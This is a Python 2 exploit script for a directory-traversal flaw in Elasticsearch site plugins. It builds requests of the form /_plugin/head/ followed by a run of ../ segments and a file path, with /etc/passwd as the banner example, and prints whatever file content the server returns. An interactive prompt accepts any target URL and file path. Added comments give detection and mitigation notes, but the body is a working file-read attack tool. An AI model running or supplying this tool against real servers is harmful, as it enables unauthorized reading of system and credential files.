import requests
import sys
# Startup banner (Python 2 script: note the print statement below).
# Besides the ASCII art and the tool title, the banner embeds one sample
# request.  That sample is the useful part for defenders: it shows the
# request shape this tool produces -- an Elasticsearch site-plugin path
# (/_plugin/<plugin name>/) followed by a run of "../" segments and an
# absolute file path.  Requests of that shape in HTTP access or proxy logs
# for port 9200 are the indicator to search for.
banner='''
_____ _ _ _____ _____ _____ __ _____ _____ _____ _____ ______
/ __ \ | | | ___| / __ \| _ |/ | | ___| |____ ||____ ||____ ||___ /
| / \/ | | | |__ ______`' / /'| |/' |`| | |___ \ ______ / / / / / / / /
| | | | | | __|______| / / | /| | | | \ \______| \ \ \ \ \ \ / /
| \__/\ \_/ / |___ ./ /___\ |_/ /_| |_/\__/ / .___/ /.___/ /.___/ /./ /
\____/\___/\____/ \_____/ \___/ \___/\____/ \____/ \____/ \____/ \_/
ElasticSearch File Read
http://xx.xx.xx.xx:9200/_plugin/head/../../../../../../../../../etc/passwd
'''
# Printed unconditionally at import/run time, before any input is read.
print banner
def read_file(url,file):
    """Send one GET for ``file`` via the site-plugin path and print the body.

    The request URL is ``url`` (minus one trailing slash, if present)
    followed by ``/_plugin/head/``, a fixed run of ``../`` segments, and
    ``file`` appended verbatim.  The response body is printed only when the
    status code is 200; every other status is dropped without any message.
    Only ``requests.ConnectionError`` is caught, so other request errors
    (and an ``IndexError`` on an empty ``url``) propagate to the caller.

    Defender notes:
      * Detection: the request line carries ``/_plugin/`` followed by
        repeated ``../`` segments; a 200 response to such a request in the
        node's or a fronting proxy's access log means file content was
        returned.
      * Mitigation: this corresponds to the directory-traversal weakness in
        Elasticsearch's serving of site plugins.  Run a release that
        contains the vendor fix, remove site plugins that are not needed,
        and do not expose the HTTP port (9200 in the banner example) to
        untrusted networks.
    """
    # Strip a single trailing slash so the joined URL has no "//".
    base = url[:-1] if url[-1] == '/' else url
    vuln_url = base + "/_plugin/head/../../../../../../../../.." + file
    try:
        response = requests.get(vuln_url)
    except requests.ConnectionError,e:
        print e
    else:
        # Non-200 answers (for example 404 from a fixed node) print nothing.
        if response.status_code == 200:
            print response.content
# Interactive prompt.  The only session state is the base URL in th["url"].
# Recognised inputs at the "file >>:" prompt:
#   exit      -> terminate the process
#   set       -> prompt for a new base URL
#   show url  -> print the current base URL
#   other     -> treated as a file path and handed to read_file()
# Nothing typed here is validated before it is used to build a request.
th = {"url":""}
while True:
    if th.get("url") == "":
        # No base URL yet: ask for one before accepting any other input.
        print "\nExample : http://10.10.20.166:9200"
        th["url"] = raw_input("\nSet URL >>: ")
        continue

    command = raw_input("\nfile >>: ")
    if command == "exit":
        exit()
    elif command == 'set':
        th['url'] = raw_input("set vuln url :")
    elif command == 'show url':
        print th.get("url")
    else:
        # Blank line, then one request for the typed path.
        print
        read_file(th.get("url"),command)
# One-shot mode: base URL and file path taken from the command line.
# NOTE(review): the `while True` prompt loop earlier in this file ends only
# through exit(), so as laid out here this guard looks unreachable.
# Indentation was lost in this listing -- confirm against the original file.
# The argument count is not checked; fewer than two arguments raises IndexError.
if __name__ == '__main__':
    cli_url, cli_file = sys.argv[1], sys.argv[2]
    read_file(cli_url, cli_file)